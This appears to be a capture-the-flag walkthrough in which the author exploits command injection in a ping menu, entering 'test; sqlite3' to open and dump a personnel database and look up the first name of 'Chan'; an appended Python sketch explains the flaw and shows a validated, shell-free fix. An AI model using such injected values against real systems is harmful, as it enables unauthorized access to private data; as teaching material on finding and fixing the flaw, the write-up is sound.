![7efa65ab29a9753391142843f38b13ca.png](ed089049494d460080c24e3c5f563a9a.png)
Need to find the first name of 'Chan'.
`2`
![200ee1e09593703e0f30b0a66e48737f.png](085963f26dbd429cbff95fff7fdaf7bf.png)
It's a ping command? Command injection?
![ab62a5a5bf9d8f4cdd33782200e55151.png](45cff9da95f1427e95999ee39863f429.png)
Command injection it is
`test; sqlite3`
`.open onboard.db`
`.dump`
![41cb2f4e34609346dc62abe0f76e8c99.png](ce880522590b48a0a92541ee77ea926e.png)
Instead of fishing through all of the data, let's do it an easier way
`select sql from sqlite_master;`
![b64ecb4d7ce61a1609ebc40b9d8f6ed3.png](6ac44846ff2743ce8f87b959aa551f57.png)
We now know that the column containing last names is named 'lname'
`select * from onboard where lname = 'Chan';`
![65754a29344a590c17ebb1925d729bcb.png](c53380d9d4464b04b87538d0537d743c.png)
Looks like his first name is Scott
Let's go back to the start and run the 'runtoanswer' program
![8ce2f064b67e45110bc03d574aac3e4b.png](848347c495aa42b1a5d6fdc76d4a149e.png)
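
The injection worked because the menu presumably pastes whatever is typed into a shell command line. The sketch below is an added example, not code from the challenge: it shows how a shell splits `test; sqlite3` into two commands, next to a wrapper that validates the target and builds an argv list instead. The `ping -c 3` form and all function names are assumptions.

```python
import ipaddress
import re
import shlex

# Hostname label: letters, digits, hyphens; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def vulnerable_command(user_input: str) -> str:
    """Assumed vulnerable pattern: input concatenated into a shell string."""
    return "ping -c 3 " + user_input


def shell_commands(cmdline: str) -> list:
    """Split a command line into the separate commands a POSIX shell would run."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token and set(token) <= set(";&|"):  # separator, not an argument
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def safe_ping_argv(user_input: str) -> list:
    """Validate the target, then return an argv list for subprocess.run(argv)."""
    host = user_input.strip()
    try:
        ipaddress.ip_address(host)  # accepts IPv4 and IPv6 literals
    except ValueError:
        labels = host.split(".")
        if len(host) > 253 or not all(_LABEL.fullmatch(l) for l in labels):
            raise ValueError("target is not an IP address or hostname") from None
    # No shell is involved, so ';' could never start a second command anyway;
    # the validation also rejects option-like input such as '-f'.
    return ["ping", "-c", "3", host]


if __name__ == "__main__":
    print(shell_commands(vulnerable_command("test; sqlite3")))
    print(safe_ping_argv("127.0.0.1"))
```

Pass the returned list to `subprocess.run` without `shell=True`, so the target is only ever a single argument to `ping`.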